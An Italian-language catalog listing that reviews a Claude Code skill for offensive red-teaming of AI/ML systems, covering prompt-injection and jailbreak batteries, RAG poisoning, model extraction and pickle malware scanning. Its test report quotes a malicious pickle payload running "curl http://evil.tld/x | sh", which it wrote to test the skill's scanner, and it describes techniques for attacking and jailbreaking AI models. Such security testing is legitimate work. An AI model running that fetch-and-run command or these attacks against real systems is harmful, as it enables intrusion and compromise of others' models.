AI Security

Test offensivi di sistemi LLM/ML: prompt injection, RAG poisoning, scansione di modelli pickle

di hypnguyen1209 · hypnguyen1209/offensive-claude

Promosso ★ 9.2/10

AI Security — Test offensivi di sistemi LLM/ML: prompt injection, RAG poisoning, scansione di modelli pickle

Cosa fa

Una skill di sicurezza offensiva per il red-teaming di sistemi AI/ML: batterie di prompt-injection e jailbreak multi-turno, RAG/vector-DB poisoning, audit di tool-poisoning MCP/agente, scansione di malware su modelli pickle pre-caricati e probe di estrazione/inferenza di appartenenza di modelli black-box, con mappature OWASP LLM Top-10 e MITRE ATLAS. Si attiva quando un utente chiede di attaccare, fare red-team o auditare un LLM, chatbot, pipeline RAG, server MCP o un artefatto di modello scaricato. Include cinque script Python eseguibili più cinque approfondimenti di riferimento legati a CVE specifici del 2024-2025.

Rapporto di test

skills/ai-security/SKILL.md recuperato e 3 file in bundle controllati a campione (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) — tutti HTTP 200. Per l'OUTPUT ho eseguito scripts/model_scan.py della skill (solo stdlib) contro pickle che ho creato: uno dannoso con __reduce__ -> os.system("curl http://evil.tld/x | sh"), uno benigno e uno benigno i cui dati contenevano solo le stringhe "operating_system"/"subprocess". La baseline (grep di byte ingenuo) ha segnalato il file dannoso ma ha anche generato un FALSO POSITIVO per il file benigno della lista di etichette. La skill ha disassemblato gli opcode pickle tramite pickletools, ha risolto posix.system tramite REDUCE-reachability come un callable deny-listed (JSONL strutturato: severity high, CWE-502, AML.T0011, exit code 2 come gate CI) e ha correttamente scagionato entrambi i file benigni. Installazione verificata in una HOME mktemp pulita posiziona SKILL.md in ~/.claude/skills/ai-security/SKILL.md.

Testato il: 2026-07-31 · Claude Code 2.x (agent harness)

Installazione

git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src
mkdir -p ~/.claude/skills
cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security
# Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/).
# Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers;
#   promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint.
# Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone):
#   /plugin marketplace add hypnguyen1209/offensive-claude
#   /plugin install offensive-claude@offensive-claude-marketplace
# NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.

Comandi e prompt di esempio

  • /ai-securityTest offensivi di sistemi LLM/ML: prompt injection, RAG poisoning, scansione di modelli pickle

Gli skill si attivano con richieste in linguaggio naturale, senza comandi da ricordare. Dopo l'installazione, prompt come questi lo attivano (in inglese):

  • Test this model against known jailbreak techniques
  • Check this RAG pipeline for vector poisoning
  • Run a model extraction attack against this API